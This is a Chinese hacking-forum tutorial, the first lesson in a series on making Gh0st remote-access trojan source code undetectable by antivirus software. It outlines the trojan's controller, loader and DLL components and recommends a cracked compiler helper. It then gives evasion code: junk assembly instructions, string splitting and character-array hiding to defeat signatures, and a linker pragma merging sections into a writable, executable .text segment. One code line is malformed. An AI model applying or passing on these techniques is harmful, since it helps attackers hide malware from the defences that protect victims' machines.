饭客论坛Gh0st系列源码免杀教程
BY:Oath
QQ:97656427
第一课:Gh0st源码免杀基础知识
需要工具:
VC++ 6.0
太多不地址
SDK库:
d.namipan/d/VC98.rar/184e40de31642ee25251a35e1efcefbdc011226249be0e04
VC++助手破解版:
这个我会给大家打包
要学源码免杀Gh0st必须先掌握Gh0st的运行流程,打开Gh0st源码,我们会发现一共有三个工程:
第一个Gh0st为主控
第二个 install是安装程序Loader,也就是安装DLL的EXE文件
第三个 svchost 是我们木马的主程序,也就是DLL文件
了解了这三点之后我们还需要设置一下VC++,
源码花指令:
__asm
{
NOP
NOP
NOP
PUSH EAX
POP EAX
}
我们还可以打乱顺序
字符串免杀方法:
1.字符串连接
//////////////////////////////////////////////////////////
//把字符串"#32770"连接起来(字符串连接法)
char *str1="#32", *str2="770",*str3=NULL;
str3=new char[strlen(str1)+strlen(str2)+1];
strcpy(str3,str1); //把str1所指由NULL结束的字符串复制到str3所指的数组中
strcat(str3,str2); //把str2所指字符串添加到str3结尾处(覆盖dest结尾处的'\0')并添加'\0'
//这样就实现了str3=str1+str2,把str1和str2连接起来了
//////////////////////////////////////////////////////////
2.字符串隐藏
char XXX[] = {'l','s','t','r','l',e', 'n', 'a','\0'};
区段合并:
最新论坛网站源码#pragma comment(linker, "/opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论